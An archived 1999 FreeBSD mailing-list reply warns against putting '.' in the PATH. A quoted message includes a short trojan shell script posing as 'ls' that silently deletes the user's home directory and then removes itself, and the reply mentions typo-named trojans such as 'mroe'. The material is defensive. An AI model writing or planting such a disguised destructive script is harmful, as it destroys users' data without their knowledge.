Date: Tue, 09 Feb 1999 18:11:01 +1000 From: Greg Black <gjb@comkey.com.au> To: Bruce Albrecht <bruce@zuhause.mn.org> Cc: questions@FreeBSD.ORG Subject: Re: math.h ? Message-ID: <19990209081101.16457.qmail@alpha.comkey.com.au> In-Reply-To: <14015.44866.751556.601222@zuhause.zuhause.mn.org> of Mon, 08 Feb 1999 21:45:06 CST References: <Pine.GSO.4.02.9902062104560.5954-100000@isis.visi.com> <xzpyamat8gk.fsf@flood.ping.uio.no> <14015.44866.751556.601222@zuhause.zuhause.mn.org>
next in thread | previous in thread | raw e-mail | index | archive | help
> > > Don't use test as your output binary. There is a system program called
> > > test, and if you have . in you path, you may not figure out why your
> > > program is not working.
> >
> > Don't put . in your path, for precisely that reason.
> >
> > Imagine I create a shell script called ls in some "attractive"
> > directory, which contains:
> >
> > #!/bin/sh
> > rm -rf ${HOME} >/dev/null 2>&1 &
> > rm $0
> > /bin/ls $@
> >
> > After one or two such encounters, you'd quickly learn not to put . in
> > your path.
>
> However, if you put "." at the end of the path, instead of the
> beginning, all the standard system binaries would be found first.
This is a really bad `solution'. because it engenders a false
sense of security. Why do you think that many of the trojans
left around are called `mroe'? Because it's a really common
typo for `more' which won't be found in the system directories
but will be found if `.' is in your PATH. Seriously, don't ever
have `.' anywhere in your PATH. It buys you very little and can
cost lots.
--
Greg Black <gjb@acm.org>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19990209081101.16457.qmail>